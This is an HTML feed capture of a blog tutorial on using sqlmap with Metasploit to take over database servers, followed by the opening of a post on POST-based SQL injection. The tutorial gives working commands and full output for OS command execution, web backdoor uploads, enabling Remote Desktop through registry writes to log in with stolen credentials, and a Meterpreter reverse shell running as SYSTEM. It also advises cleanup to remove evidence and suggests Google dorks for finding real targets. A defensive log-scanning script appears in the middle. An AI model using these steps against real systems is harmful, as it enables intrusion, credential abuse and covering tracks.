It is possible to execute commands on the database server's underlying operating system when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, AND the session user has the&amp;nbsp;necessary privileges: on MySQL that means the FILE privilege (and in practice DBA rights), since sqlmap has to write its UDF shared library into a directory the server will load it from and then run CREATE FUNCTION through stacked queries; on PostgreSQL it means superuser rights for the same reason; on Microsoft SQL Server it means the sysadmin role, so it can (re)enable and call xp_cmdshell. If you want to understand how SQLMAP accomplishes this, please visit the homesite for the product or read the docs included with the download, as I don't have the time to go into that here; just know it works and is very capable, and the method used changes slightly depending on whether or not you need to see/retrieve the command output on screen...&lt;br /&gt;
These techniques are also well detailed in the white paper linked from the homesite's main page, "Advanced SQL injection to operating system full control". The basic command structure looks like this:&lt;br /&gt;
&lt;br /&gt;
EX: python sqlmap.py -u "&lt;a href="http://site.com/pgsql/example.php?id=1"&gt;http://site.com/pgsql/example.php?id=1&lt;/a&gt;" --os-cmd id -v 1&lt;br /&gt;
&lt;br /&gt;
Results... &lt;br /&gt;
&lt;div&gt;web application technology: PHP 5.2.6, Apache 2.2.9&lt;/div&gt;&lt;div&gt;back-end DBMS: MySQL&lt;/div&gt;&lt;div&gt;[16:09:15] [INFO] fingerprinting the back-end DBMS operating system&lt;/div&gt;&lt;div&gt;[16:09:15] [INFO] the back-end DBMS operating system is Linux&lt;/div&gt;&lt;div&gt;[16:09:18] [INFO] testing if current user is DBA&lt;/div&gt;&lt;div&gt;[16:09:25] [INFO] detecting back-end DBMS version from its banner&lt;/div&gt;&lt;div&gt;[16:09:25] [INFO] checking if UDF 'sys_eval' already exist&lt;/div&gt;&lt;div&gt;[16:09:35] [INFO] checking if UDF 'sys_exec' already exist&lt;/div&gt;&lt;div&gt;[16:09:35] [INFO] creating UDF 'sys_eval' from the binary UDF file&lt;/div&gt;&lt;div&gt;[16:09:35] [INFO] creating UDF 'sys_exec' from the binary UDF file&lt;/div&gt;&lt;div&gt;do you want to retrieve the command standard output? [Y/n/a] y&lt;/div&gt;&lt;div&gt;command standard output:&amp;nbsp;&amp;nbsp;&amp;nbsp; 'uid=104(mysql) gid=106(mysql) groups=106(mysql)'&lt;/div&gt;[16:09:37] [INFO] cleaning up the database management system &lt;br /&gt;
&lt;div&gt;do you want to remove UDF 'sys_eval'? [Y/n] y&lt;/div&gt;&lt;div&gt;do you want to remove UDF 'sys_exec'? [Y/n] y&lt;/div&gt;&lt;div&gt;[16:09:45] [INFO] database management system cleanup finished&lt;/div&gt;&lt;div&gt;[16:09:45] [WARNING] remember that UDF shared object files saved on the file system can &lt;/div&gt;&lt;div&gt;only be deleted manually&lt;/div&gt;&lt;br /&gt;
You should&amp;nbsp;choose "YES" to most of the prompts unless you really know what you are doing. This is especially true for the cleanup phase, which drops the user-defined functions that made the takeover possible (removing one more piece of evidence). Note the last warning, though: the shared library sqlmap wrote to the server's file system stays there until you delete it yourself, for instance with a further --os-cmd. &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;If SQLMAP has not confirmed that stacked queries can be used (the usual case with PHP or ASP talking to MySQL through an API that accepts only one statement at a time) and the DBMS is MySQL, it is still possible to perform a successful attack using SELECT ... INTO OUTFILE to write a web backdoor into a writable folder within the web server document root, which then gives command execution through the web server (assuming the back-end DBMS and the web server are hosted on the same machine; if not, all bets are off!). This needs the FILE privilege, a secure_file_priv setting that does not forbid writing to that folder, and the folder being writable by the account MySQL runs as.&amp;nbsp;If this scenario is detected SQLMAP will prompt you for the document root and additional folders to try to upload the web file stager and backdoor to. The tool has pre-built file stagers and backdoors for the following languages: ASP, ASP.NET, JSP and PHP (which is the default option). You will be prompted to make these selections to aid the tool in getting the job done when you run the initial takeover command using the '--os-cmd' argument. &lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;In addition to executing single commands on the underlying OS you can also ask for an interactive OS shell using the '--os-shell' argument. It simulates a real shell and lets you execute as many arbitrary commands as you need, with the same TAB completion and history functionality that --sql-shell has, or that you would experience in most shell environments (note the difference: --sql-shell gives you a prompt for SQL statements, --os-shell one for operating system commands). Another alternative is simply passing your statements with&amp;nbsp;the '--sql-query' feature like so:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap.py -u &lt;a href="http://site.com/example.asp?id=666"&gt;http://site.com/example.asp?id=666&lt;/a&gt; --sql-query "SELECT @@datadir"&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: Sometimes SQLMAP will find an injection point but fail to pull anything useful,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; so it is worth double-checking your results here, or fetching bits of data that SQLMAP&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; does not include in its base set of commands (like the example above, which returns the&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; MySQL data directory, handy for working out where the server keeps its files before you try to write any)&lt;br /&gt;
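Before reaching for '--os-cmd' or the INTO OUTFILE fallback it pays to ask the database the questions sqlmap is going to need answered anyway: which OS and version it runs on, where its data and plugin directories are, whether secure_file_priv restricts where it may write, and whether your session user even has the FILE privilege. The script below is an added example, not code from the original post or from the sqlmap project: it runs those checks through '--sql-query' and includes a small helper that applies the secure_file_priv rules to candidate web-root paths, so the alternatives you hand to sqlmap's document-root prompt are ones that can actually work. It assumes a sqlmap build that understands --batch (auto-answers its prompts), sqlmap.py in the current directory, a MySQL back end and Unix-style paths; the URL and paths in the usage line are placeholders.&lt;br /&gt;

```sh
#!/bin/sh
# Added example (not from the original post or the sqlmap project): pre-flight checks
# for the OS-takeover options, driven through sqlmap's --sql-query. Assumptions:
# sqlmap.py in the current directory, a build that accepts --batch, MySQL back end,
# Unix-style paths. Set DRY_RUN=1 to print the commands instead of running them.

# Command line for one query; printed in dry-run mode and mirrored in run_preflight.
sqlmap_query_cmd() {
    printf "python sqlmap.py -u '%s' --batch --sql-query \"%s\"\n" "$1" "$2"
}

# Apply MySQL's secure_file_priv rules to a candidate INTO OUTFILE target.
# $1 = value of @@secure_file_priv as sqlmap prints it, $2 = candidate path.
# Empty value = no restriction (the 5.0/5.1 default), NULL = file export disabled on
# newer servers, anything else = only paths below that directory are writable.
outfile_allowed() {
    priv=$1
    target=$2
    case $priv in
        '')   return 0 ;;
        NULL) return 1 ;;
    esac
    priv=${priv%/}                     # tolerate a trailing slash in the setting
    case $target in
        "$priv"/*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Filter a list of document-root guesses down to those secure_file_priv would permit.
writable_candidates() {
    priv=$1
    shift
    for dir in "$@"; do
        if outfile_allowed "$priv" "$dir/stager.php"; then
            printf '%s\n' "$dir"
        fi
    done
}

# Run (or in dry-run mode, print) the checks. @@plugin_dir exists from MySQL 5.1 on;
# the last query only works for users who can read mysql.user, so an error there
# already tells you that you are not DBA.
run_preflight() {
    url=$1
    for q in 'SELECT @@version' \
             'SELECT @@version_compile_os' \
             'SELECT @@datadir' \
             'SELECT @@plugin_dir' \
             'SELECT @@secure_file_priv' \
             "SELECT file_priv FROM mysql.user WHERE CONCAT(user,'@',host)=CURRENT_USER()"; do
        printf '### %s\n' "$q"
        if [ -n "$DRY_RUN" ]; then
            sqlmap_query_cmd "$url" "$q"
        else
            python sqlmap.py -u "$url" --batch --sql-query "$q"
        fi
    done
}

# Usage: ./preflight.sh 'http://site.com/example.php?id=1'
if [ "$#" -ge 1 ]; then
    run_preflight "$1"
fi
```

Run it once against the injection point before the takeover options; if secure_file_priv comes back as a directory outside the web root, or file_priv is N, the INTO OUTFILE route is closed and you are down to stacked queries and the UDF route (or a different privilege level). On a Windows back end compare the paths case-insensitively with backslashes; the helper above only handles Unix-style paths.&lt;br /&gt;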
&lt;br /&gt;
More Takeover Techniques? You bet ya... &lt;br /&gt;
&lt;div&gt;If the database server is hosted on a Windows machine you can also use SQLMAP to read and write the system registry. This is possible when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server AND stacked queries are supported. The current session user will also need the proper privileges to access it.&lt;/div&gt;&lt;br /&gt;
Arguments that can be used: &lt;br /&gt;
&lt;div&gt;&amp;nbsp;'--reg-read' used to read registry key values.&lt;/div&gt;&lt;div&gt;&amp;nbsp;'--reg-add' used to write registry key values&lt;/div&gt;&lt;div&gt;&amp;nbsp;'--reg-del' used to delete registry key values&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&amp;nbsp;Auxiliary registry switches: '--reg-key', '--reg-value', '--reg-data' and '--reg-type' &lt;br /&gt;
&lt;div&gt;&amp;nbsp;Auxiliary switches can be used as additional arguments to define the registry specifics for the main arguments and skip the interactive prompts&lt;/div&gt;&lt;div&gt;&amp;nbsp;'--reg-key=PATH' used to specify the key path in the Windows registry&lt;/div&gt;&lt;div&gt;&amp;nbsp;'--reg-value=NAME' used to define the value item name inside the provided key&lt;/div&gt;&lt;div&gt;&amp;nbsp;'--reg-data=VALUE' used to define the value data&lt;/div&gt;&lt;div&gt;&amp;nbsp;'--reg-type=TYPE' used to define the type of the value&lt;/div&gt;&lt;br /&gt;
Here is an example of what it would look like if we wanted to check whether Remote Desktop is already enabled on a remote Windows Server 2003 target:&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap.py -u &lt;a href="http://site.com/example.aspx?id=1"&gt;http://site.com/example.aspx?id=1&lt;/a&gt; --reg-read --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections&lt;br /&gt;
&lt;br /&gt;
Results... &lt;br /&gt;
&lt;div&gt;=1...&lt;/div&gt;&lt;div&gt;Damn... for fDenyTSConnections 0 = enabled and 1 = disabled&lt;/div&gt;&lt;div&gt;...Good thing we are persistent ;)&lt;/div&gt;&lt;br /&gt;
To enable Remote Desktop on the target machine so we can then remote in using some of the credentials we dumped from the database earlier :)&lt;br /&gt;
&lt;br /&gt;
EX: sqlmap.py -u &lt;a href="http://site.com/example.aspx?id=1"&gt;http://site.com/example.aspx?id=1&lt;/a&gt; --reg-add --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --reg-type=DWORD --reg-data=0&lt;br /&gt;
&lt;br /&gt;
Now issue the '--reg-read' command again to confirm the value was updated and now returns 0.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;NOTE: Depending on the system this takes effect straight away or only after a restart, and either way&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; the Windows Firewall still has to allow TCP 3389 and the Terminal Services service has to be running,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; so this may not be all that helpful in real-life settings, but it should give you an idea of what you&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; are capable of, as the options are only limited by your knowledge of the system registry, so get to studying... &lt;br /&gt;
&lt;div&gt;...&lt;/div&gt;&lt;div&gt;......&lt;/div&gt;&lt;div&gt;More Takeover Techniques? Yeah, I got&amp;nbsp;a few more for you...&lt;/div&gt;&lt;div&gt;....so that is what SQLMAP is capable of on its own; now let's see what we can do when we add Metasploit to the equation and use SQLMAP's out-of-band stateful connections (i.e. Metasploit modules &amp;amp; Meterpreter), with the following arguments/switches to put it all together: '--os-pwn', '--os-smbrelay', '--os-bof', '--priv-esc', '--msf-path' and '--tmp-path'. Each of these options performs a different attack to try to take over the database server, and they can get you an interactive command prompt, a Meterpreter session or a VNC session.&lt;/div&gt;SQLMAP relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. &lt;br /&gt;
&lt;br /&gt;
These techniques are: &lt;br /&gt;
&lt;ol&gt;&lt;li&gt;Database in-memory execution of Metasploit's shellcode via sqlmap's own user-defined function sys_bineval(). Supported on MySQL and PostgreSQL. Switch or argument to use this attack method: '--os-pwn'&lt;/li&gt;
&lt;li&gt;Upload and execution of a Metasploit stand-alone payload stager via sqlmap's own user-defined function sys_exec() on MySQL and PostgreSQL, or via xp_cmdshell() on Microsoft SQL Server. Switch or argument to use: '--os-pwn'&lt;/li&gt;
&lt;li&gt;Execution of Metasploit's shellcode by performing an SMB reflection attack (MS08-068) with a UNC path request from the database server to your machine, where the Metasploit smb_relay server exploit is set up and listening. Supported when running sqlmap with high privileges (uid=0) on Linux/Unix, since the relay has to bind port 445, and the target DBMS runs as Administrator on Windows. Switch or argument to use this attack method: '--os-smbrelay'. This requires setting up the SMB relay attack from Metasploit's ./msfconsole&lt;/li&gt;
&lt;li&gt;Database in-memory execution of Metasploit's shellcode by exploiting the Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow (MS09-004). sqlmap has its own exploit to trigger the vulnerability, with automatic DEP memory protection bypass, but it relies on Metasploit to generate the shellcode that gets executed upon successful exploitation. Switch or argument to use this attack method: '--os-bof'&lt;/li&gt;
&lt;/ol&gt;Let's begin with option 1: '--os-pwn'&lt;br /&gt;
EX: python sqlmap.py -u "&lt;a href="http://www.site.com/mysql/iis/example.aspx?id=1"&gt;http://www.site.com/mysql/iis/example.aspx?id=1&lt;/a&gt;" --os-pwn --msf-path /pentest/exploits/framework3&lt;br /&gt;
&lt;br /&gt;
Most important thing to note here is that we are defining the path to Metasploit with the '--msf-path' argument, so sqlmap knows where to look and can have Metasploit prepare the shellcode used for the attack. (NOTE: I believe this is one of the reasons it doesn't work on Windows, as the path will not use Windows-friendly path names/formatting and it seems to be hard coded for Linux use only.) This works similarly to the outline above for '--os-cmd', in that SQLMAP will do everything possible to make it work without user interaction, but it may prompt you to identify the document root folder so it knows where to try to upload to. You can also provide comma-separated alternatives as additional options/places to try. &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
Results from above '--os-pwn' command... &lt;br /&gt;
&lt;div&gt;[...]&lt;/div&gt;&lt;div&gt;[hh:mm:31] [INFO] the back-end DBMS is MySQL&lt;/div&gt;&lt;div&gt;web server operating system: Windows 2003&lt;/div&gt;&lt;div&gt;web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0&lt;/div&gt;&lt;div&gt;back-end DBMS: MySQL 5.0&lt;/div&gt;&lt;div&gt;[16:10:05] [INFO] fingerprinting the back-end DBMS operating system&lt;/div&gt;&lt;div&gt;[16:10:05] [INFO] the back-end DBMS operating system is Windows&lt;/div&gt;&lt;div&gt;how do you want to establish the tunnel?&lt;/div&gt;&lt;div&gt;[1] TCP: Metasploit Framework (default)&lt;/div&gt;&lt;div&gt;[2] ICMP: icmpsh - ICMP tunneling&lt;/div&gt;&lt;div&gt;&amp;gt; &lt;/div&gt;&lt;div&gt;[16:10:05] [INFO] testing if current user is DBA&lt;/div&gt;&lt;div&gt;[16:10:05] [INFO] fetching current user&lt;/div&gt;&lt;div&gt;what is the back-end database management system architecture?&lt;/div&gt;&lt;div&gt;[1] 32-bit (default)&lt;/div&gt;&lt;div&gt;[2] 64-bit&lt;/div&gt;&lt;div&gt;&amp;gt; &lt;/div&gt;&lt;div&gt;[16:10:05] [INFO] checking if UDF 'sys_bineval' already exist&lt;/div&gt;&lt;div&gt;[16:10:06] [INFO] checking if UDF 'sys_exec' already exist&lt;/div&gt;&lt;div&gt;[16:10:09] [INFO] detecting back-end DBMS version from its banner&lt;/div&gt;&lt;div&gt;[16:10:09] [INFO] retrieving MySQL base directory absolute path&lt;/div&gt;&lt;div&gt;[16:10:11] [INFO] creating UDF 'sys_bineval' from the binary UDF file&lt;/div&gt;&lt;div&gt;[16:10:12] [INFO] creating UDF 'sys_exec' from the binary UDF file&lt;/div&gt;&lt;div&gt;how do you want to execute the Metasploit shellcode on the back-end database underlying &lt;/div&gt;&lt;div&gt;operating system?&lt;/div&gt;&lt;div&gt;[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)&lt;/div&gt;&lt;div&gt;[2] Stand-alone payload stager (file system way)&lt;/div&gt;&lt;div&gt;&amp;gt; &lt;/div&gt;&lt;div&gt;[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode &lt;/div&gt;&lt;div&gt;which 
connection type do you want to use?&lt;/div&gt;&lt;div&gt;[1] Reverse TCP: Connect back from the database host to this machine (default)&lt;/div&gt;&lt;div&gt;[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports &lt;/div&gt;&lt;div&gt;between the specified and 65535&lt;/div&gt;&lt;div&gt;[3] Bind TCP: Listen on the database host for a connection&lt;/div&gt;&lt;div&gt;&amp;gt; &lt;/div&gt;&lt;div&gt;which is the local address? [192.168.136.1] &lt;/div&gt;&lt;div&gt;which local port number do you want to use? [60641] &lt;/div&gt;&lt;div&gt;which payload do you want to use?&lt;/div&gt;&lt;div&gt;[1] Meterpreter (default)&lt;/div&gt;&lt;div&gt;[2] Shell&lt;/div&gt;&lt;div&gt;[3] VNC&lt;/div&gt;&lt;div&gt;&amp;gt; &lt;/div&gt;&lt;div&gt;[16:10:15] [INFO] creation in progress ... done&lt;/div&gt;&lt;div&gt;[16:10:15] [INFO] running Metasploit Framework 3 command line interface locally, please wait..&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&amp;lt;METASPLOIT Banner&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; =[ metasploit v3.8.0-dev [core:3.8 api:1.0]&lt;br /&gt;
+ -- --=[ 688 exploits - 357 auxiliary - 39 post&lt;br /&gt;
+ -- --=[ 217 payloads - 27 encoders - 8 nops&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; =[ svn r12655 updated today (2011.05.17) &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
PAYLOAD =&amp;gt; windows/meterpreter/reverse_tcp &lt;br /&gt;
&lt;div&gt;EXITFUNC =&amp;gt; thread&lt;/div&gt;&lt;div&gt;LPORT =&amp;gt; 60641&lt;/div&gt;&lt;div&gt;LHOST =&amp;gt; 192.168.136.1&lt;/div&gt;&lt;div&gt;[*] Started reverse handler on 192.168.136.1:60641 &lt;/div&gt;&lt;div&gt;[*] Starting the payload handler...&lt;/div&gt;&lt;div&gt;[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', &lt;/div&gt;&lt;div&gt;please wait..&lt;/div&gt;&lt;div&gt;[*] Sending stage (749056 bytes) to 192.168.136.129&lt;/div&gt;&lt;div&gt;[*] Meterpreter session 1 opened (192.168.136.1:60641 -&amp;gt; 192.168.136.129:1689) at Mon Apr 11 &lt;/div&gt;&lt;div&gt;hh:mm:52 +0100 2011&lt;/div&gt;meterpreter &amp;gt; Loading extension espia...success. &lt;br /&gt;
&lt;div&gt;meterpreter &amp;gt; Loading extension incognito...success.&lt;/div&gt;&lt;div&gt;meterpreter &amp;gt; [-] The 'priv' extension has already been loaded.&lt;/div&gt;&lt;div&gt;meterpreter &amp;gt; Loading extension sniffer...success.&lt;/div&gt;&lt;div&gt;meterpreter &amp;gt; System Language : en_US&lt;/div&gt;&lt;div&gt;OS&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : Windows .NET Server (Build 3790, Service Pack 2).&lt;/div&gt;&lt;div&gt;Computer&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : W2K3R2&lt;/div&gt;&lt;div&gt;Architecture&amp;nbsp;&amp;nbsp;&amp;nbsp; : x86&lt;/div&gt;&lt;div&gt;Meterpreter&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : x86/win32&lt;/div&gt;&lt;div&gt;meterpreter &amp;gt; Server username: NT AUTHORITY\SYSTEM&lt;/div&gt;&lt;div&gt;meterpreter &amp;gt; ipconfig&lt;/div&gt;&lt;div&gt;MS TCP Loopback interface&lt;/div&gt;&lt;div&gt;Hardware MAC: 00:00:00:00:00:00&lt;/div&gt;&lt;div&gt;IP Address&amp;nbsp; : 127.0.0.1&lt;/div&gt;&lt;div&gt;Netmask&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : 255.0.0.0&lt;/div&gt;Intel(R) PRO/1000 MT Network Connection &lt;br /&gt;
&lt;div&gt;Hardware MAC: 00:0c:29:fc:79:39&lt;/div&gt;&lt;div&gt;IP Address&amp;nbsp; : 192.168.136.129&lt;/div&gt;&lt;div&gt;Netmask&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : 255.255.255.0&lt;/div&gt;meterpreter &amp;gt; exit &lt;br /&gt;
&lt;div&gt;[*] Meterpreter session 1 closed.&amp;nbsp; Reason: User exit&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
By default MySQL on Windows runs as SYSTEM; PostgreSQL, however, runs as the low-privileged user "postgres" on both Windows and Linux. Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the time as NETWORK SERVICE and sometimes as LOCAL SERVICE. &lt;br /&gt;
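From the defender's side, the run above leaves a distinctive trail inside the database: two CREATE FUNCTION ... SONAME statements followed by a call to the new function, all on one connection. The script below is an added example (not part of this post, sqlmap or Metasploit) that hunts for that sequence in MySQL general-log lines; the log lines and the library file name are constructed, and the sys_eval name is assumed from sqlmap's MySQL UDF set.&lt;br /&gt;

```python
"""Hunt MySQL general-log lines for UDF registration and use of the kind
sqlmap's --os-cmd / --os-pwn takeover performs (added example, not sqlmap code)."""
import re

# Constructed general-log lines, not real captures.  The library file name is a
# placeholder; the function names are the ones the post's output shows.
SAMPLE_GENERAL_LOG = [
    "110411 16:10:09\t   42 Query\tSELECT @@basedir, @@version_compile_os",
    "110411 16:10:11\t   42 Query\tCREATE FUNCTION sys_bineval RETURNS INTEGER SONAME 'udf_placeholder.dll'",
    "110411 16:10:12\t   42 Query\tCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf_placeholder.dll'",
    "110411 16:10:48\t   42 Query\tSELECT sys_exec('hostname')",
    "110411 16:11:02\t   43 Query\tSELECT id, name FROM products WHERE id = 1",
    "110411 16:11:05\t   43 Quit\t",
]

# Names sqlmap registers on MySQL: the two seen above plus sys_eval (assumed).
SQLMAP_UDF_NAMES = ("sys_exec", "sys_bineval", "sys_eval")

# MySQL 5.x layout: date, time, padded thread id, command, tab, argument.
# Continuation lines that omit the timestamp are not handled here.
LINE_RE = re.compile(r"^(\S+ \S+)\s+(\d+)\s+(\w+)\s*(.*)$")
# Any UDF registration, whatever the name: legitimate ones are rare enough
# to review one by one.
CREATE_FUNC_RE = re.compile(
    r"create\s+function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)
CALL_RE = re.compile(r"\b(" + "|".join(SQLMAP_UDF_NAMES) + r")\s*\(", re.I)
# A shared library has to reach the disk before it can be registered; writing
# files from SQL is the usual route and worth a look on its own.
DUMPFILE_RE = re.compile(r"\binto\s+(dump|out)file\b", re.I)


def parse_line(line):
    """Split one general-log line into (thread_id, command, argument) or None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return int(m.group(2)), m.group(3), m.group(4)


def scan_general_log(lines):
    """Return one finding dict per suspicious statement, in log order."""
    findings = []
    for number, line in enumerate(lines, start=1):
        parsed = parse_line(line)
        if parsed is None or parsed[1] != "Query":
            continue
        thread_id, _, sql = parsed
        m = CREATE_FUNC_RE.search(sql)
        if m:
            name, library = m.group(1).lower(), m.group(2)
            findings.append({
                "line": number, "thread": thread_id, "kind": "udf_registered",
                "name": name, "library": library,
                "known_sqlmap_name": name in SQLMAP_UDF_NAMES,
            })
            continue
        m = CALL_RE.search(sql)
        if m:
            findings.append({"line": number, "thread": thread_id,
                             "kind": "udf_called", "name": m.group(1).lower()})
            continue
        if DUMPFILE_RE.search(sql):
            findings.append({"line": number, "thread": thread_id,
                             "kind": "file_written_from_sql"})
    return findings


def threads_with_udf_activity(findings):
    """Connection threads that both registered and then called a UDF: the
    exact sequence the --os-pwn run above produces."""
    registered = {f["thread"] for f in findings if f["kind"] == "udf_registered"}
    called = {f["thread"] for f in findings if f["kind"] == "udf_called"}
    return sorted(registered.intersection(called))


if __name__ == "__main__":
    found = scan_general_log(SAMPLE_GENERAL_LOG)
    for f in found:
        print(f)
    print("threads to investigate:", threads_with_udf_activity(found))
```

The same names can be checked directly in a live server by listing the registered functions in the mysql.func table; a sys_exec or sys_bineval row there is reason to treat the host as compromised.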
&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;It is also possible to provide sqlmap with the --priv-esc switch to perform a database process' user privilege escalation via Metasploit's getsystem command, which includes, among others, the kitrap0d technique (MS10-015). &lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;This brings us to the end of this adventure. I hope you have enjoyed these last few articles on some different methods of performing SQL injection with this great tool called SQLMAP. I can only think of one other topic for which I might cover this tool again, and that would be how to use it to attack an ORACLE database like the new 10g or 11g, but we will see (not sure if I have any time anytime soon).&amp;nbsp;I am also leaning towards a quick mini article on SQLNINJA, a similar tool whose goal is less focused on extracting data and more focused on getting full access to the underlying OS, and which really has some neat features built into it, and then on to bigger and better topics. I hope to bring you more tutorials and introductions to other great tools in the near future; until then please stay tuned and check back often for updates. Until next time - H.R.&lt;/div&gt;
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/6495090393668047101/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/05/owning-database-with-sqlmap-and.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/6495090393668047101?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/6495090393668047101?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/0YNDrPIlhe4/owning-database-with-sqlmap-and.html" title="Owning the Database with SQLMAP and METASPLOIT" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/05/owning-database-with-sqlmap-and.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QFQng7cCp7ImA9WhZXGUo.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-2367849738517970986</id><published>2011-05-09T17:15:00.000-05:00</published><updated>2011-05-09T17:15:13.608-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-09T17:15:13.608-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="POST" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking" /><category 
scheme="http://www.blogger.com/atom/ns#" term="GET" /><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><category scheme="http://www.blogger.com/atom/ns#" term="POST Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="$GET" /><category scheme="http://www.blogger.com/atom/ns#" term="$POST" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL" /><category scheme="http://www.blogger.com/atom/ns#" term="sqlmap" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Burpsuite" /><title>This ain't your standard $GET request!</title><content type="html">Today I will show you how to use SQLMAP to perform SQL injections via $POST. I should point out that this is not all that common a vulnerability in the wild these days, but it is very good to know and should be tested before you give up all hope on your target site. I would rate this as Intermediate in nature, due to the complex nature of orchestrating things to work, but it is not all that hard to do if you give it a few tries. Here we go, try to keep up...&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;Start off by making sure you have the following requirements:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Burpsuite (latest copy - free version is fine)&lt;/li&gt;
&lt;li&gt;Download from Homepage:&amp;nbsp; &lt;a href="http://portswigger.net/burp/download.html"&gt;http://portswigger.net/burp/download.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Just download and run burpsuite_v1.3.03.jar file (version number may change)&lt;/li&gt;
&lt;li&gt;Requires a Java Runtime Environment (JRE) to be installed to run; platform independent&lt;/li&gt;
&lt;li&gt;SQLMAP (latest copy - Open Source=FREE)&lt;/li&gt;
&lt;li&gt;Download from Homepage:&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://sourceforge.net/projects/sqlmap/files/sqlmap/"&gt;http://sourceforge.net/projects/sqlmap/files/sqlmap/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Requires Python to be installed; platform independent, although not all features are available on the Windows platform&lt;/li&gt;
&lt;li&gt;*Site with $POST data being submitted for us to find and inject (e.g. a login page or search fields)&lt;/li&gt;
&lt;li&gt;Example Google Dork: "inurl:admin/login.php" get creative and get better results&lt;/li&gt;
&lt;/ul&gt;Now it is time to find a site where we can start doing some testing; let us use Google to see what we can find using a simple dork:&lt;br /&gt;
EX:&amp;nbsp;"ext:php inurl:admin/login site:US" &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE:&amp;nbsp; There are variations to this, so use your own creativity to increase your odds&lt;br /&gt;
